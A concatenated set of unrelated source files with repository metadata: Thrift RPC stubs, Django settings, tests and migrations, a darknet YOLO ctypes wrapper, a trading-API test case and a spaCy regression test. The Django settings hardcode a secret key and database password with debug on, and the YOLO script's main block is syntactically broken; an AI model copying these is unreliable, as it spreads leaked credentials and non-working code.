my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
print(' '.join([x[::-1] if x != 'you' else x for x in my_list]))
|
[
"[email protected]"
] | |
d6c42962c8c27b0253171b232edbef46fb681496
|
b1182238bf0d26451d567e3100cea940be771ff1
|
/hd-thrift-idl/hd-thrift-idl-social/src/main/python/SocialAdminService/ISocialAdminServiceDeleteAdminPost.py
|
2ea38cd7fffadcfa9fbbd5dc18012fea42a09f4d
|
[] |
no_license
|
ybg555/vue-tvBox
|
af6df0e07848efc1c2ac80ee8b7c16c65b790a40
|
57e3849e7f8272794e5a38d5e49bb68f7a44f286
|
refs/heads/master
| 2021-01-15T15:42:23.728423 | 2016-10-02T09:36:08 | 2016-10-02T09:36:08 | 55,936,790 | 1 | 0 | null | 2016-04-12T01:07:09 | 2016-04-11T02:52:05 |
Python
|
UTF-8
|
Python
| false | true | 6,833 |
py
|
#coding=utf-8
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
    """Abstract service interface generated by the Thrift compiler."""

    def deleteAdminPost(self, post):
        """
        Delete a post.

        @param post
        @return
        @author zhijian.li

        Parameters:
         - post
        """
        pass
class Client(Iface):
    """Thrift client stub for the deleteAdminPost RPC (generated code)."""

    def __init__(self, iprot, oprot=None):
        # One protocol may serve both directions; an explicit oprot overrides output.
        self._iprot = self._oprot = iprot
        if oprot is not None:
            self._oprot = oprot
        self._seqid = 0

    def deleteAdminPost(self, post):
        """
        Delete a post.

        @param post
        @return
        @author zhijian.li

        Parameters:
         - post
        """
        self.send_deleteAdminPost(post)
        return self.recv_deleteAdminPost()

    def send_deleteAdminPost(self, post):
        # Serialize the call frame: message header + args struct, then flush.
        self._oprot.writeMessageBegin('deleteAdminPost', TMessageType.CALL, self._seqid)
        args = deleteAdminPost_args()
        args.post = post
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()

    def recv_deleteAdminPost(self):
        # Read the reply frame; server-side faults arrive as EXCEPTION messages.
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = deleteAdminPost_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteAdminPost failed: unknown result");
class Processor(Iface, TProcessor):
    """Server-side dispatcher for the deleteAdminPost RPC (generated code)."""

    def __init__(self, handler):
        self._handler = handler
        self._processMap = {}
        self._processMap["deleteAdminPost"] = Processor.process_deleteAdminPost

    def process(self, iprot, oprot):
        # Route an incoming message to its handler; unknown method names are
        # skipped on the wire and answered with an UNKNOWN_METHOD exception.
        (name, type, seqid) = iprot.readMessageBegin()
        if name not in self._processMap:
            iprot.skip(TType.STRUCT)
            iprot.readMessageEnd()
            x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
            oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
            x.write(oprot)
            oprot.writeMessageEnd()
            oprot.trans.flush()
            return
        else:
            self._processMap[name](self, seqid, iprot, oprot)
        return True

    def process_deleteAdminPost(self, seqid, iprot, oprot):
        # Decode args, invoke the user handler, and write the REPLY frame.
        args = deleteAdminPost_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = deleteAdminPost_result()
        result.success = self._handler.deleteAdminPost(args.post)
        oprot.writeMessageBegin("deleteAdminPost", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class deleteAdminPost_args:
    """
    Attributes:
     - post
    """

    # Wire schema: field 1 is the TAdminPost struct being deleted.
    thrift_spec = (
        None, # 0
        (1, TType.STRUCT, 'post', (TAdminPost.ttypes.TAdminPost, TAdminPost.ttypes.TAdminPost.thrift_spec), None, ), # 1
    )

    def __init__(self, post=None,):
        self.post = post

    def read(self, iprot):
        # Fast path: let the C extension decode directly from the transport.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.post = TAdminPost.ttypes.TAdminPost()
                    self.post.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('deleteAdminPost_args')
        if self.post is not None:
            oprot.writeFieldBegin('post', TType.STRUCT, 1)
            self.post.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __hash__(self):
        value = 17
        value = (value * 31) ^ hash(self.post)
        return value

    def __repr__(self):
        # NOTE(review): iteritems() is Python 2 only — confirm target runtime.
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class deleteAdminPost_result:
    """
    Attributes:
     - success
    """

    # Wire schema: field 0 is the bool return value.
    thrift_spec = (
        (0, TType.BOOL, 'success', None, None, ), # 0
    )

    def __init__(self, success=None,):
        self.success = success

    def read(self, iprot):
        # Fast path: C-accelerated binary decode when available.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.BOOL:
                    self.success = iprot.readBool();
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('deleteAdminPost_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.BOOL, 0)
            oprot.writeBool(self.success)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __hash__(self):
        value = 17
        value = (value * 31) ^ hash(self.success)
        return value

    def __repr__(self):
        # NOTE(review): iteritems() is Python 2 only — confirm target runtime.
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
|
[
"[email protected]"
] | |
4ea78129b575c0fa392a02973b2e72fc68d1979c
|
c37414be07a423968c897887b0844830e349741f
|
/fastestimator/backend/to_number.py
|
766952ad187cb9f583dbacd315fbeb6d65a050c5
|
[
"Apache-2.0"
] |
permissive
|
vbvg2008/fastestimator-future
|
5175047a1acac42f7172f8b9bb326486ed25a5a0
|
dbf7d597d1f97140f837345f6b06f1773d4fa299
|
refs/heads/master
| 2022-03-30T22:48:59.349348 | 2020-01-06T08:35:04 | 2020-01-06T08:35:04 | 227,687,532 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
import tensorflow as tf
import torch
def to_number(data):
    """Return *data* as a NumPy value when it is a TF or PyTorch tensor.

    Any other input is returned unchanged.
    """
    if isinstance(data, tf.Tensor):
        return data.numpy()
    if isinstance(data, torch.Tensor):
        # .data detaches from autograd history before conversion
        return data.data.numpy()
    return data
|
[
"[email protected]"
] | |
bed9cb10f6453c7018cc7f08aefc7153fb29f8cd
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/ETFMM_K/YW_ETFMM_SZSJ_408_K.py
|
1bed5c3ce3bd01583d66e471f4a5c2ac987176e2
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,088 |
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SZSJ_408_K(xtp_test_case):
# YW_ETFMM_SZSJ_408_K
def test_YW_ETFMM_SZSJ_408_K(self):
title = '深圳A股股票交易日五档即成转撤销委托卖-错误的业务类型'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11000370,
'errorMSG': queryOrderErrorMsg(11000370),
'是否生成报单': '否',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('999999', '2', '14', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_IPOS'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_CANCEL'],
'price': stkparm['随机中间价'],
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
9c1513fc38a50fa093602c41444c8be32727345d
|
f47fe8a7d8cd87b3bfa2e172b4a9fc93e3a4abc2
|
/2015/AST1/vezbovni/David/habl.py
|
1b759c2b4f14d8433cbff56e9e18ac1feecb3585
|
[] |
no_license
|
ispastlibrary/Titan
|
a4a7e4bb56544d28b884a336db488488e81402e0
|
f60e5c6dc43876415b36ad76ab0322a1f709b14d
|
refs/heads/master
| 2021-01-17T19:23:32.839966 | 2016-06-03T13:47:44 | 2016-06-03T13:47:44 | 60,350,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
import numpy as np
#import matplot.pyplot as plt

# Weighted least-squares slope of V against d (Hubble-law style fit).
# Fix-ups vs. original: the filename must be a string literal, the loadtxt
# keyword is `unpack` (was `unpac`), the weighted sums of y (wi*V) and
# x (wi*d) were left as empty np.sum() calls, and `no.sum` was a typo
# for `np.sum`.
d, V, wi, deltav = np.loadtxt('habl.txt', unpack=True)
sum_wi = np.sum(wi)
sum_wy = np.sum(wi * V)
sum_wx = np.sum(wi * d)
sum_wxy = np.sum(wi * d * V)
sum_wx2 = np.sum(wi * d * d)
# Slope of the weighted linear fit: b = (S*Sxy - Sy*Sx) / (S*Sxx - Sx^2)
b = (sum_wxy * sum_wi - sum_wy * sum_wx) / (sum_wi * sum_wx2 - sum_wx**2)
print(b)
|
[
"[email protected]"
] | |
b91fb546cbb42329ea80e0be279d6f298648f0d1
|
848cf2c39afe417272ce96d738266995cb0c9ca1
|
/jirani/tests.py
|
4c8d790627ab1c565880f05b726771f4c571271d
|
[
"MIT"
] |
permissive
|
cliffnyendwe/neighbourhood
|
462c2d13d966745de6c63675e799e57cf412eca8
|
77e1a1a082a94fb5a883012a66bf2a4504e6d33b
|
refs/heads/master
| 2020-04-14T05:41:39.902621 | 2019-01-14T08:10:40 | 2019-01-14T08:10:40 | 163,369,785 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 716 |
py
|
from django.test import TestCase
# Create your tests here.
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Neighborhood , Profile , Business
class TestUser(TestCase):
    """Model tests for the built-in User (and, partially, profile saving)."""

    def setUp(self):
        # Unsaved user instance shared by the tests below.
        self.testuser = User(username="user", email="[email protected]")

    def test_instance(self):
        self.assertIsInstance(self.testuser, User)

    def test_save_user(self):
        # save() should move the instance from absent to present in the DB.
        self.assertFalse(self.testuser in User.objects.all())
        self.testuser.save()
        self.assertTrue(self.testuser in User.objects.all())

    def test_save_profile(self):
        # NOTE(review): only saves a second User — no Profile is created or
        # asserted here; this test looks unfinished.
        self.fuser = User(username="fuser", email="[email protected]")
        self.fuser.save()
|
[
"cliffnyendwe"
] |
cliffnyendwe
|
02de053f7a35ad14f7c9469e279ff827159d5414
|
904bf81488ce47c93453a8a841403e831f03ebe0
|
/tx_lobbying/search_indexes.py
|
edb9f8e6255ec97382048159f312a5a1398c6c77
|
[
"Apache-2.0"
] |
permissive
|
texastribune/tx_lobbying
|
b7b26ed8acb6059f46bf1e4285af69398795b074
|
81dd911667e5368b874a56d5fba8e1613f7027ee
|
refs/heads/master
| 2020-04-01T09:25:11.457807 | 2015-05-19T03:34:53 | 2015-05-19T03:34:53 | 7,674,962 | 1 | 3 | null | 2015-05-28T03:08:54 | 2013-01-17T21:47:06 |
Python
|
UTF-8
|
Python
| false | false | 920 |
py
|
"""
Haystack search indicies.
I denormalize thing here to try and make things easier on the database later.
"""
from haystack import indexes
from .models import Lobbyist, Interest
class LobbyistIndex(indexes.SearchIndex, indexes.Indexable):
    """Haystack index for Lobbyist: name as document plus edge-ngram autocomplete."""

    text = indexes.CharField(model_attr='name', document=True)
    content_auto = indexes.EdgeNgramField(model_attr='name')
    url = indexes.CharField()

    def get_model(self):
        return Lobbyist

    def get_updated_field(self):
        # Lets Haystack reindex only rows changed since the last run.
        return 'updated_at'

    def prepare_url(self, obj):
        return obj.get_absolute_url()
class InterestIndex(indexes.SearchIndex, indexes.Indexable):
    """Haystack index for Interest: name as document plus edge-ngram autocomplete.

    NOTE(review): unlike LobbyistIndex there is no get_updated_field — confirm
    whether incremental reindexing is intended for Interest.
    """

    text = indexes.CharField(model_attr='name', document=True)
    content_auto = indexes.EdgeNgramField(model_attr='name')
    url = indexes.CharField()

    def get_model(self):
        return Interest

    def prepare_url(self, obj):
        return obj.get_absolute_url()
|
[
"[email protected]"
] | |
3dab6d251c6ac13c212ea60b449bf66fc68e4008
|
48d86947d5f3b5896c4a05cfcddcff01582a26ef
|
/amnesia/task/migrations/0002_auto_20170504_2027.py
|
1792df7727f51e01362639cf36de2a20b7de1620
|
[] |
no_license
|
pratulyab/amnesia
|
181874288c97fbf7e73d10c64e214c2a17574773
|
6b0b3428a27f98e0e2f6bb8aefdc8a4459e7b8cc
|
refs/heads/master
| 2021-01-20T12:49:16.592335 | 2017-05-07T20:38:06 | 2017-05-07T20:38:06 | 90,409,855 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 908 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-04 20:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: widen the choices for Task.every and Task.sleep_cycle."""

    dependencies = [
        ('task', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='every',
            field=models.CharField(choices=[('15', '15 minutes'), ('30', '30 minutes'), ('45', '45 minutes'), ('0', '60 minutes')], default='0', help_text='Repeat every', max_length=2),
        ),
        migrations.AlterField(
            model_name='task',
            name='sleep_cycle',
            field=models.CharField(choices=[('4-19', '8pm - 4am'), ('5-20', '9pm - 5am'), ('6-21', '10pm - 6am'), ('7-22', '11pm - 7am'), ('8-23', '12pm - 8am')], default='4-19', help_text='Assuming 8 hours sleep cycle', max_length=5),
        ),
    ]
|
[
"[email protected]"
] | |
7f611c84c8e4bd5fbd87fdfe6e15165d7275e17f
|
f7bdda5ce6026e30f8d2258499d066cec0a9bf6a
|
/detect_object.py
|
03a40e8e061ac0b96d172f6b950f5f922d728bb4
|
[] |
no_license
|
AbhishekBose/yolo_docker
|
cfb3e3fe3dda8092771f614bdd9ce3ea022435e1
|
1377a73b38a95cfdde37ddc215a6f90ecbd407b0
|
refs/heads/master
| 2022-06-25T21:14:51.702133 | 2019-12-15T15:30:19 | 2019-12-15T15:30:19 | 228,206,788 | 10 | 10 | null | 2022-06-01T20:54:18 | 2019-12-15T15:29:53 |
Python
|
UTF-8
|
Python
| false | false | 5,336 |
py
|
#%%
from ctypes import *
import random
import argparse
import os
import traceback
import cv2
import functools
import numpy as np
import time
import sys
import imutils
#%%
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
    """Build a ctypes array of *ctype* initialized from *values*."""
    buf = (ctype * len(values))()
    for i, v in enumerate(values):
        buf[i] = v
    return buf
class BOX(Structure):
    # ctypes mirror of darknet's C box struct: four floats (x, y, w, h).
    # Field order/types must match the C layout exactly.
    _fields_ = [("x", c_float),
                ("y", c_float),
                ("w", c_float),
                ("h", c_float)]
class DETECTION(Structure):
    # ctypes mirror of darknet's C detection struct; `prob` points at an
    # array of per-class probabilities of length `classes`.
    _fields_ = [("bbox", BOX),
                ("classes", c_int),
                ("prob", POINTER(c_float)),
                ("mask", POINTER(c_float)),
                ("objectness", c_float),
                ("sort_class", c_int)]
class IMAGE(Structure):
    # ctypes mirror of darknet's C image struct: dimensions plus a pointer
    # to the float pixel buffer (owned by the Python side, see array_to_image).
    _fields_ = [("w", c_int),
                ("h", c_int),
                ("c", c_int),
                ("data", POINTER(c_float))]
class METADATA(Structure):
    # ctypes mirror of darknet's metadata: class count and class-name array.
    _fields_ = [("classes", c_int),
                ("names", POINTER(c_char_p))]
libdarknet_path = os.path.join("/home/darknet/libdarknet.so")
lib = CDLL(libdarknet_path, RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
    """Run the classifier and return (class_name, score) pairs, best first."""
    scores = predict_image(net, im)
    pairs = [(meta.names[i], scores[i]) for i in range(meta.classes)]
    pairs.sort(key=lambda p: -p[1])
    return pairs
def array_to_image(arr):
    """Convert an HWC uint8 numpy image to a darknet IMAGE struct.

    Returns (im, arr): the IMAGE points into arr's buffer, so the caller
    must keep arr alive for as long as im is used.
    """
    # need to return old values to avoid python freeing memory
    # HWC -> CHW, then scale [0, 255] bytes to [0, 1] floats for darknet.
    arr = arr.transpose(2,0,1)
    c, h, w = arr.shape[0:3]
    arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
    data = arr.ctypes.data_as(POINTER(c_float))
    im = IMAGE(w,h,c,data)
    return im, arr
def netdetect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
    """Run darknet object detection on a numpy image.

    Returns a list of (class_name, probability, (x, y, w, h)) tuples sorted
    by descending probability; box coordinates are clamped at 0.
    """
    im, image = array_to_image(image)
    rgbgr_image(im)
    num = c_int(0)
    pnum = pointer(num)
    predict_image(net, im)
    dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
    num = pnum[0]
    # Non-max suppression collapses overlapping boxes of the same class.
    if (nms): do_nms_obj(dets, num, meta.classes, nms);
    res = []
    for j in range(num):
        # Keep only detections with at least one nonzero class probability.
        a = dets[j].prob[0:meta.classes]
        if any(a):
            ai = np.array(a).nonzero()[0]
            for i in ai:
                b = dets[j].bbox
                res.append((meta.names[i], dets[j].prob[i], (max(b.x,0), max(b.y,0), max(b.w,0), max(b.h,0))))
    res = sorted(res, key=lambda x: -x[1])
    # NOTE(review): array_to_image always returns a numpy array here, so this
    # bytes check never fires and free_image is never called — confirm whether
    # the IMAGE buffer needs explicit freeing (potential leak).
    if isinstance(image,bytes): free_image(im)
    free_detections(dets, num)
    return res
#%%
def convert_yolo_normal(x, y, w, h, s1, s2):
    """Convert a YOLO-style (center-x, center-y, width, height) box into
    integer (left, right, top, bottom) edge coordinates.

    NOTE(review): s1/s2 are accepted but never used — presumably image
    dimensions for scaling; confirm whether scaling was intended.
    """
    left = (2 * x - w) / 2
    right = w + left
    top = (2 * y - h) / 2
    bottom = h + top
    return (int(left), int(right), int(top), int(bottom))
#%%
if __name__ == "__main__":
config_file = 'object_detector.config'
with open('config.json') as f:
data = json.load(f)
weights_file = data['weights_file']
cfg_file = data['cfg_file']
obj_data = data['obj_file']
image_name = sys.argv[1]
img = cv2.imread(image_name)
netdet = load_net(cfg_file,weights_file,0)
metadet = load_meta(obj_data)
obj_res = netdetect(netlp,metalp, veh,0.7)
for obj_res:
print('All detected objects are:: ')
for i in range(len(obj_res)):
print(obj_res[i][0])
|
[
"[email protected]"
] | |
129e029f51e6c808b38cbff8b551f38366f41e0c
|
0726e305f3a7b57e8837ddcd334148ec68e9d2de
|
/portfolio/settings.py
|
79f45073c3745b1bc73328e6685fcf08e83d4536
|
[
"MIT"
] |
permissive
|
Brian23-eng/portfolio-1
|
873448172532c0dd82de496911ad509022189db1
|
70ec48288fadf803a166f70728adfb1a61916a6d
|
refs/heads/master
| 2022-09-24T21:26:13.670066 | 2020-01-23T05:36:20 | 2020-01-23T05:36:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,673 |
py
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y#k96$zi!2uc9@tj#bvr0smlxx1v)2dcff447#%=kwn)$4(*1i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'portfolio.myportfolio',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'portfolio',
'USER': 'moringa',
'PASSWORD': 'p@$$w0rd',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/project_images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'project_images')
# Configure Django app for Heroku
django_heroku.settings(locals())
|
[
"[email protected]"
] | |
953b813584667bf1bd1e285fa7bdb8d4caa9ffa5
|
9bb18febdfc911a88756afd9490526f8e7929bfc
|
/spacy/tests/regression/test_issue3951.py
|
f9912c494ec18b830006793bd039c8ffa525a4cc
|
[
"MIT"
] |
permissive
|
ashaffer/spaCy
|
3c28c7c8422fd4072bd3d472e796994d3269cf9f
|
ec0beccaf13eef263feec27e820136ad1e270bd4
|
refs/heads/master
| 2020-07-05T23:42:00.467234 | 2019-08-16T16:39:25 | 2019-08-16T16:39:25 | 202,819,156 | 1 | 0 |
MIT
| 2019-08-17T01:06:11 | 2019-08-17T01:06:10 | null |
UTF-8
|
Python
| false | false | 585 |
py
|
# coding: utf8
from __future__ import unicode_literals
import pytest
from spacy.matcher import Matcher
from spacy.tokens import Doc
@pytest.mark.xfail
def test_issue3951(en_vocab):
    """Test that combinations of optional rules are matched correctly."""
    # Pattern: "hello", optional "this", one optional wildcard token, "world".
    matcher = Matcher(en_vocab)
    pattern = [
        {"LOWER": "hello"},
        {"LOWER": "this", "OP": "?"},
        {"OP": "?"},
        {"LOWER": "world"},
    ]
    matcher.add("TEST", None, pattern)
    doc = Doc(en_vocab, words=["Hello", "my", "new", "world"])
    matches = matcher(doc)
    # Marked xfail: expected matcher behavior for stacked optional operators
    # is still under discussion — see the referenced issue number in the name.
    assert len(matches) == 0
|
[
"[email protected]"
